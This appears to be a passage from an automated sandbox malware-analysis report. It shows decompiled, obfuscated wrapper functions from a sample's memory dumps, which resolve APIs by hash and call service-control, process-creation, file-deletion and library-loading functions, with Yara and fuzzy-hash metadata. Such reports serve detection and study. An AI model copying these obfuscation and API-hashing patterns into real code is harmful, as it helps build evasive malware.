                                                      				_v12 = _v12 ^ 0x39ccf342;
                                                      				_v8 = 0xe8d9;
                                                      				_v8 = _v8 * 0x16;
                                                      				_v8 = _v8 | 0x4145347f;
                                                      				_v8 = _v8 ^ 0x9035ef96;
                                                      				_v8 = _v8 ^ 0xd1609914;
                                                      				E002807A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
                                                      				_t27 = CloseServiceHandle(_a4); // executed
                                                      				return _t27;
                                                      			}








                                                      APIs
                                                      • CloseServiceHandle.ADVAPI32(39CCF342), ref: 00276025
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2111315259.0000000000271000.00000020.00000001.sdmp, Offset: 00270000, based on PE: true
                                                      • Associated: 0000000A.00000002.2111298675.0000000000270000.00000004.00000001.sdmp
                                                      • Associated: 0000000A.00000002.2111387036.000000000028C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandleService
                                                      • String ID:
                                                      • API String ID: 1725840886-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Executed Functions

                                                      C-Code - Quality: 62%
                                                      			E001A2959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
                                                      				unsigned int _v8;
                                                      				signed int _v12;
                                                      				void* _t30;
                                                      				void* _t39;
                                                      				signed int _t41;
                                                      				signed int _t42;
                                                      
                                                      				_push(_a16);
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(0);
                                                      				_push(0);
                                                      				E001A602B(_t30);
                                                      				_v12 = 0x5e3c;
                                                      				_t41 = 0x63;
                                                      				_v12 = _v12 / _t41;
                                                      				_t42 = 0x2f;
                                                      				_v12 = _v12 / _t42;
                                                      				_v12 = _v12 ^ 0x000064be;
                                                      				_v8 = 0x74da;
                                                      				_v8 = _v8 | 0xfefeeaea;
                                                      				_v8 = _v8 >> 0xc;
                                                      				_v8 = _v8 ^ 0x000fb531;
                                                      				E001B07A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
                                                      				_t39 = OpenSCManagerW(0, 0, _a16); // executed
                                                      				return _t39;
                                                      			}










                                                      APIs
                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 001A29DC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2112953957.00000000001A1000.00000020.00000001.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2112942195.00000000001A0000.00000004.00000001.sdmp
                                                      • Associated: 0000000B.00000002.2113005292.00000000001BC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ManagerOpen
                                                      • String ID: <^
                                                      • API String ID: 1889721586-3203995635
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 58%
                                                      			E001AC6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                      				signed int _v8;
                                                      				unsigned int _v12;
                                                      				intOrPtr _v16;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _v24;
                                                      				intOrPtr _v28;
                                                      				void* _t29;
                                                      				intOrPtr* _t33;
                                                      				void* _t34;
                                                      
                                                      				E001A602B(_t29);
                                                      				_v28 = 0x4fe02f;
                                                      				_v24 = 0x232390;
                                                      				_v20 = 0xf8460;
                                                      				_v16 = 0;
                                                      				_v12 = 0xf625;
                                                      				_v12 = _v12 >> 6;
                                                      				_v12 = _v12 >> 0xa;
                                                      				_v12 = _v12 + 0xffffcc6f;
                                                      				_v12 = _v12 ^ 0xffffa5b6;
                                                      				_v8 = 0xe5cd;
                                                      				_v8 = _v8 + 0xffffae4d;
                                                      				_v8 = _v8 | 0xf8bbefe7;
                                                      				_v8 = _v8 ^ 0xf8bbcc9a;
                                                      				_t33 = E001B07A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
                                                      				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
                                                      				return _t34;
                                                      			}













                                                      APIs
                                                      • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 001AC762
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2112953957.00000000001A1000.00000020.00000001.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2112942195.00000000001A0000.00000004.00000001.sdmp
                                                      • Associated: 0000000B.00000002.2113005292.00000000001BC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FolderPath
                                                      • String ID: /O
                                                      • API String ID: 1514166925-1923427199
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 82%
                                                      			E001A1000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                                      				unsigned int _v8;
                                                      				signed int _v12;
                                                      				signed int _v16;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _v24;
                                                      				void* _t33;
                                                      				struct HINSTANCE__* _t40;
                                                      				signed int _t42;
                                                      
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				E001A602B(_t33);
                                                      				_v16 = _v16 & 0x00000000;
                                                      				_v24 = 0x1b2eda;
                                                      				_v20 = 0x33a3b7;
                                                      				_v12 = 0x98c;
                                                      				_v12 = _v12 + 0xb426;
                                                      				_v12 = _v12 + 0x5beb;
                                                      				_t42 = 0x63;
                                                      				_v12 = _v12 / _t42;
                                                      				_v12 = _v12 ^ 0x00000fce;
                                                      				_v8 = 0x120e;
                                                      				_v8 = _v8 + 0xfffffcb8;
                                                      				_v8 = _v8 + 0xffffefaa;
                                                      				_v8 = _v8 >> 5;
                                                      				_v8 = _v8 ^ 0x07ff9a02;
                                                      				E001B07A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
                                                      				_t40 = LoadLibraryW(_a12); // executed
                                                      				return _t40;
                                                      			}












                                                      APIs
                                                      • LoadLibraryW.KERNEL32(0033A3B7), ref: 001A1096
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2112953957.00000000001A1000.00000020.00000001.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2112942195.00000000001A0000.00000004.00000001.sdmp
                                                      • Associated: 0000000B.00000002.2113005292.00000000001BC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID: [
                                                      • API String ID: 1029625771-3431493590
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E001A4859() {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				void* _t22;
                                                      
                                                      				_v12 = 0xafe2;
                                                      				_v12 = _v12 * 0x42;
                                                      				_v12 = _v12 + 0xffffdd89;
                                                      				_v12 = _v12 ^ 0x002d198d;
                                                      				_v8 = 0x5b09;
                                                      				_v8 = _v8 | 0xa1ea9544;
                                                      				_v8 = _v8 * 0x12;
                                                      				_v8 = _v8 ^ 0x6283d9c1;
                                                      				E001B07A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
                                                      				ExitProcess(0);
                                                      			}







                                                      APIs
                                                      • ExitProcess.KERNELBASE(00000000), ref: 001A48B7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2112953957.00000000001A1000.00000020.00000001.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2112942195.00000000001A0000.00000004.00000001.sdmp
                                                      • Associated: 0000000B.00000002.2113005292.00000000001BC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID: [
                                                      • API String ID: 621844428-1822564810
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 66%
                                                      			E001B4F7D(void* __ecx, void* __edx, void* _a4) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				void* _t17;
                                                      				int _t24;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_push(_a4);
                                                      				_push(__ecx);
                                                      				E001A602B(_t17);
                                                      				_v12 = 0xddd8;
                                                      				_v12 = _v12 * 0x48;
                                                      				_v12 = _v12 ^ 0x003e66d8;
                                                      				_v8 = 0xcb35;
                                                      				_v8 = _v8 ^ 0x7b88573c;
                                                      				_v8 = _v8 * 0x59;
                                                      				_v8 = _v8 ^ 0xf27e4a21;
                                                      				E001B07A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
                                                      				_t24 = CloseHandle(_a4); // executed
                                                      				return _t24;
                                                      			}








                                                      APIs
                                                      • CloseHandle.KERNELBASE(003E66D8), ref: 001B4FE2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2112953957.00000000001A1000.00000020.00000001.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2112942195.00000000001A0000.00000004.00000001.sdmp
                                                      • Associated: 0000000B.00000002.2113005292.00000000001BC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandle
                                                      • String ID: {#lm
                                                      • API String ID: 2962429428-1564096886
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 21%
                                                      			E001B976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
                                                      				unsigned int _v8;
                                                      				signed int _v12;
                                                      				void* _t34;
                                                      				int _t39;
                                                      				struct _PROCESS_INFORMATION* _t48;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_t48 = __edx;
                                                      				_push(0);
                                                      				_push(_a68);
                                                      				_push(0);
                                                      				_push(_a60);
                                                      				_push(_a56);
                                                      				_push(_a52);
                                                      				_push(0);
                                                      				_push(_a44);
                                                      				_push(_a40);
                                                      				_push(0);
                                                      				_push(0);
                                                      				_push(_a28);
                                                      				_push(_a24);
                                                      				_push(_a20);
                                                      				_push(_a16);
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__edx);
                                                      				_push(__ecx);
                                                      				E001A602B(_t34);
                                                      				_v12 = 0xaff9;
                                                      				_v12 = _v12 | 0xcee54bd1;
                                                      				_v12 = _v12 + 0x6ed6;
                                                      				_v12 = _v12 ^ 0xcee61221;
                                                      				_v8 = 0x6229;
                                                      				_v8 = _v8 ^ 0x42aa9f31;
                                                      				_v8 = _v8 >> 2;
                                                      				_v8 = _v8 ^ 0x10aad83f;
                                                      				E001B07A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
                                                      				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
                                                      				return _t39;
                                                      			}









                                                      APIs
                                                      • CreateProcessW.KERNEL32(001A591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,001A591A), ref: 001B9816
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2112953957.00000000001A1000.00000020.00000001.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2112942195.00000000001A0000.00000004.00000001.sdmp
                                                      • Associated: 0000000B.00000002.2113005292.00000000001BC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                                      • Instruction ID: c14167928e6f8a19f945f8d6f9c5ceb943b34b86e27e48255c8f3f464bc41596
                                                      • Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                                      • Instruction Fuzzy Hash: B611D372800148BBDF1A9FD2DC0ACDF7F3AEF89750F104048FA1452120D2728AA0EBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 31%
                                                      			E001AB566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
                                                      				unsigned int _v8;
                                                      				signed int _v12;
                                                      				void* _t32;
                                                      				void* _t38;
                                                      				long _t47;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_push(_a48);
                                                      				_t47 = __edx;
                                                      				_push(_a44);
                                                      				_push(_a40);
                                                      				_push(_a36);
                                                      				_push(_a32);
                                                      				_push(_a28);
                                                      				_push(_a24);
                                                      				_push(0);
                                                      				_push(_a16);
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__edx);
                                                      				_push(0);
                                                      				E001A602B(_t32);
                                                      				_v8 = 0xfd14;
                                                      				_v8 = _v8 >> 4;
                                                      				_v8 = _v8 * 0x7a;
                                                      				_v8 = _v8 >> 9;
                                                      				_v8 = _v8 ^ 0x00002bef;
                                                      				_v12 = 0x4f26;
                                                      				_v12 = _v12 | 0xe7e97f76;
                                                      				_v12 = _v12 ^ 0xe7e94dbb;
                                                      				E001B07A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
                                                      				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
                                                      				return _t38;
                                                      			}









                                                      APIs
                                                      • CreateFileW.KERNELBASE(001B0668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,001B0668,?,?,?,?), ref: 001AB5FD
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2112953957.00000000001A1000.00000020.00000001.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2112942195.00000000001A0000.00000004.00000001.sdmp
                                                      • Associated: 0000000B.00000002.2113005292.00000000001BC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                                      • Instruction ID: e5733e9fdf210549cf26afe424110afe728034a9007d37a999dcfce89e81f1c0
                                                      • Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                                      • Instruction Fuzzy Hash: BB11B272801248BBDF16DF95DD06CEE7F7AEF89314F148198FA1862120D3729A60EB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 54%
                                                      			E001B981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				void* _t22;
                                                      				void* _t28;
                                                      				void* _t34;
                                                      				long _t37;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_push(_a16);
                                                      				_t34 = __edx;
                                                      				_t37 = __ecx;
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__edx);
                                                      				_push(__ecx);
                                                      				E001A602B(_t22);
                                                      				_v12 = 0xe68;
                                                      				_v12 = _v12 * 0x39;
                                                      				_v12 = _v12 ^ 0xd1b1d871;
                                                      				_v12 = _v12 ^ 0xd1b2fb7e;
                                                      				_v8 = 0x629e;
                                                      				_v8 = _v8 + 0xfffff5da;
                                                      				_v8 = _v8 | 0xbef7b77b;
                                                      				_v8 = _v8 ^ 0xbef79fc3;
                                                      				E001B07A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
                                                      				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
                                                      				return _t28;
                                                      			}










                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,001A87F2,0000CAAE,0000510C,AD82F196), ref: 001B989B
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2112953957.00000000001A1000.00000020.00000001.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2112942195.00000000001A0000.00000004.00000001.sdmp
                                                      • Associated: 0000000B.00000002.2113005292.00000000001BC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                                      • Instruction ID: 42a206b897d3a744831a2136ae9c7f5b8d244681696b6909cee3277b473e3bb2
                                                      • Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                                      • Instruction Fuzzy Hash: 62019A76801208FBDB04EFE5D846CDFBF79EF85310F108188F908A6220E7715B619BA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 62%
                                                      			E001B7BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				void* _t24;
                                                      				int _t31;
                                                      				signed int _t33;
                                                      				struct _SHFILEOPSTRUCTW* _t40;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_push(_a12);
                                                      				_t40 = __ecx;
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__ecx);
                                                      				E001A602B(_t24);
                                                      				_v8 = 0xa117;
                                                      				_t33 = 0x76;
                                                      				_v8 = _v8 / _t33;
                                                      				_v8 = _v8 >> 4;
                                                      				_v8 = _v8 ^ 0x210fe703;
                                                      				_v8 = _v8 ^ 0x210fdcea;
                                                      				_v12 = 0xf1e9;
                                                      				_v12 = _v12 << 9;
                                                      				_v12 = _v12 ^ 0x01e3a445;
                                                      				E001B07A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
                                                      				_t31 = SHFileOperationW(_t40); // executed
                                                      				return _t31;
                                                      			}










                                                      APIs
                                                      • SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 001B7C67
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2112953957.00000000001A1000.00000020.00000001.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2112942195.00000000001A0000.00000004.00000001.sdmp
                                                      • Associated: 0000000B.00000002.2113005292.00000000001BC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileOperation
                                                      • String ID:
                                                      • API String ID: 3080627654-0
                                                      • Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                                      • Instruction ID: 5e8e6e0cdd4164639f69cbbc61abfe607cd10762053eb91f82b675b17997c5af
                                                      • Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                                      • Instruction Fuzzy Hash: 9F014BB190120CFFEB09DFA4C94A8DEBBB9EF55314F208198F505A7240EBB15F509B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 52%
                                                      			E001AF65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
                                                      				unsigned int _v8;
                                                      				signed int _v12;
                                                      				void* _t24;
                                                      				void* _t29;
                                                      				int _t35;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_push(_a20);
                                                      				_t35 = __ecx;
                                                      				_push(_a16);
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__ecx);
                                                      				E001A602B(_t24);
                                                      				_v12 = 0xd5a7;
                                                      				_v12 = _v12 ^ 0x994cba9d;
                                                      				_v12 = _v12 ^ 0x994c19d3;
                                                      				_v8 = 0xac88;
                                                      				_v8 = _v8 << 3;
                                                      				_v8 = _v8 >> 8;
                                                      				_v8 = _v8 + 0xebed;
                                                      				_v8 = _v8 ^ 0x0000ab82;
                                                      				E001B07A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
                                                      				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
                                                      				return _t29;
                                                      			}









                                                      APIs
                                                      • OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 001AF6D8
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2112953957.00000000001A1000.00000020.00000001.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2112942195.00000000001A0000.00000004.00000001.sdmp
                                                      • Associated: 0000000B.00000002.2113005292.00000000001BC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: OpenService
                                                      • String ID:
                                                      • API String ID: 3098006287-0
                                                      • Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                                      • Instruction ID: aab9d42c268e910dc9a8f538ab20f7f7e710b89855c126f8d0e1ce521e15dfe7
                                                      • Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                                      • Instruction Fuzzy Hash: 7301E5B6901208BBEF059F94DD068DF7F75EB15324F148188F90462250D7B25E61DBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 58%
                                                      			E001AB6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                      				signed int _v8;
                                                      				unsigned int _v12;
                                                      				void* _t23;
                                                      				intOrPtr* _t27;
                                                      				void* _t28;
                                                      
                                                      				E001A602B(_t23);
                                                      				_v12 = 0x9431;
                                                      				_v12 = _v12 >> 7;
                                                      				_v12 = _v12 ^ 0x0000160f;
                                                      				_v8 = 0xc972;
                                                      				_v8 = _v8 ^ 0x829e0126;
                                                      				_v8 = _v8 + 0x4512;
                                                      				_v8 = _v8 + 0xffff18f9;
                                                      				_v8 = _v8 ^ 0x829e24c1;
                                                      				_t27 = E001B07A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
                                                      				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
                                                      				return _t28;
                                                      			}









                                                      APIs
                                                      • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 001AB759
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2112953957.00000000001A1000.00000020.00000001.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2112942195.00000000001A0000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000B.00000002.2113005292.00000000001BC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileHandleInformation
                                                      • String ID:
                                                      • API String ID: 3935143524-0
                                                      • Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                                      • Instruction ID: 81ee3e12c56c95e62bf86db32ba309777ebfeea9871da59311798476c7155c51
                                                      • Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                                      • Instruction Fuzzy Hash: 2D012CB5941308FBEB45DF94DD06A9E7BB5EB18704F108188FA0566190D7B15A209B51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 58%
                                                      			E001BAA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                                      				signed int _v8;
                                                      				unsigned int _v12;
                                                      				void* _t21;
                                                      				int _t27;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__ecx);
                                                      				E001A602B(_t21);
                                                      				_v12 = 0xcc49;
                                                      				_v12 = _v12 << 6;
                                                      				_v12 = _v12 >> 2;
                                                      				_v12 = _v12 ^ 0x000ca988;
                                                      				_v8 = 0x5d85;
                                                      				_v8 = _v8 | 0xb9d19a55;
                                                      				_v8 = _v8 * 0xd;
                                                      				_v8 = _v8 ^ 0x6fa87272;
                                                      				E001B07A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
                                                      				_t27 = DeleteFileW(_a12); // executed
                                                      				return _t27;
                                                      			}








                                                      APIs
                                                      • DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 001BAAA8
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2112953957.00000000001A1000.00000020.00000001.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2112942195.00000000001A0000.00000004.00000001.sdmp
                                                      • Associated: 0000000B.00000002.2113005292.00000000001BC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DeleteFile
                                                      • String ID:
                                                      • API String ID: 4033686569-0
                                                      • Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                                      • Instruction ID: 38beca1a52a817a935afa96b8843bd557fd6e6818e72c6d2ef1ffa71afed9f2f
                                                      • Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                                      • Instruction Fuzzy Hash: C5F069B590020CFFDF08DFA4DD4A89EBFB4EB45304F108088F905A6250D7B29B549B50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 70%
                                                      			E001A5FB2(void* __ecx, void* __edx, void* _a4) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				void* _t21;
                                                      				int _t27;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_push(_a4);
                                                      				_push(__ecx);
                                                      				E001A602B(_t21);
                                                      				_v12 = 0x33d;
                                                      				_v12 = _v12 + 0xc3dc;
                                                      				_v12 = _v12 | 0x39ccfb02;
                                                      				_v12 = _v12 ^ 0x39ccf342;
                                                      				_v8 = 0xe8d9;
                                                      				_v8 = _v8 * 0x16;
                                                      				_v8 = _v8 | 0x4145347f;
                                                      				_v8 = _v8 ^ 0x9035ef96;
                                                      				_v8 = _v8 ^ 0xd1609914;
                                                      				E001B07A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
                                                      				_t27 = CloseServiceHandle(_a4); // executed
                                                      				return _t27;
                                                      			}








                                                      APIs
                                                      • CloseServiceHandle.ADVAPI32(39CCF342), ref: 001A6025
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2112953957.00000000001A1000.00000020.00000001.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2112942195.00000000001A0000.00000004.00000001.sdmp
                                                      • Associated: 0000000B.00000002.2113005292.00000000001BC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandleService
                                                      • String ID:
                                                      • API String ID: 1725840886-0
                                                      • Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                                      • Instruction ID: 266ed730544f100bafaeeee47fcd9407c5a1817c99f09a0a8e6eecd9317c3c87
                                                      • Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                                      • Instruction Fuzzy Hash: ACF04FB4C11208FFDB08DFA0E94689EBFB8EB50300F208198E549A7260E7715F559F54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Executed Functions

                                                      C-Code - Quality: 62%
                                                      			E006C2959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
                                                      				unsigned int _v8;
                                                      				signed int _v12;
                                                      				void* _t30;
                                                      				void* _t39;
                                                      				signed int _t41;
                                                      				signed int _t42;
                                                      
                                                      				_push(_a16);
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(0);
                                                      				_push(0);
                                                      				E006C602B(_t30);
                                                      				_v12 = 0x5e3c;
                                                      				_t41 = 0x63;
                                                      				_v12 = _v12 / _t41;
                                                      				_t42 = 0x2f;
                                                      				_v12 = _v12 / _t42;
                                                      				_v12 = _v12 ^ 0x000064be;
                                                      				_v8 = 0x74da;
                                                      				_v8 = _v8 | 0xfefeeaea;
                                                      				_v8 = _v8 >> 0xc;
                                                      				_v8 = _v8 ^ 0x000fb531;
                                                      				E006D07A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
                                                      				_t39 = OpenSCManagerW(0, 0, _a16); // executed
                                                      				return _t39;
                                                      			}










                                                      APIs
                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 006C29DC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2117427965.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                                      • Associated: 0000000C.00000002.2117418822.00000000006C0000.00000004.00000001.sdmp
                                                      • Associated: 0000000C.00000002.2117456048.00000000006DC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
